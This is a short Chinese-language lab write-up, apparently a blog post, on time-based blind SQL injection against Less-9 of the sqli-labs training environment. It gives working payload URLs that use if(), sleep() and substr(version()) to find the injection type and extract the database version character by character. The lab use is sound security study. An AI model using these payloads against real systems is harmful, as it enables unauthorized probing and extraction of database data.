延时(时间)注入(盲注)

任务：sqli_labs第9关，通过延时注入，获取版本号

思路

通过单引号，双引号判断字符类型，再观察是否有回显，发现没有回显，而且页面也没有其他变化，看上去似乎是静态页面。

由于页面没有任何变化，导致无法判断出是字符型还是数字型注入

所以思路就要想到延时注入了，通过if 与 sleep()函数，根据响应时间来猜出是字符型还是数值型注入。

判断注入类型

http://localhost/sqli_labs/Less-9/?id=1' and if(1=1,sleep(4),2)--+

通过and if(1=1,sleep(4), 2)来设置判断条件与响应时间，我们可以在 id=1之后通过各种符号尝试闭合，并且需要在结尾加上 --+注释后面的sql语句，然后根据响应时间来判断注入类型

通过这种方式，我们可以判断出这关的注入类型为字符型，而且是使用单引号闭合。

盲猜手法

主要通过if里面的判断条件，在利用substr来截取版本号的数字，将截取的数字通过if判断，最后根据响应时间来判断是否猜测正确

盲猜版本号

一般版本号都是这种格式：x.x.xx，所以可以根据这个格式，再使用二分查找法来猜测版本号，注意小数点也算字符

猜第一个数字：http://localhost/sqli_labs/Less-9/?id=1' and if(substr(version(),1,1)=5,sleep(4),2)--+猜第二个数字：http://localhost/sqli_labs/Less-9/?id=1' and if(substr(version(),3,1)=7,sleep(4),2)--+猜第3个数字：http://localhost/sqli_labs/Less-9/?id=1' and if(substr(version(),5,2)=26,sleep(4),2)--+

关键命令解释：

if(substr(version(),5,2)=26,sleep(4),2)：从版本号的第5个字符开始截取，截取2个字符，然后将其与26比较，如果结果为true，就进行sleep(4)，否则返回2

来源地址：https://blog.csdn.net/weixin_46367450/article/details/132461056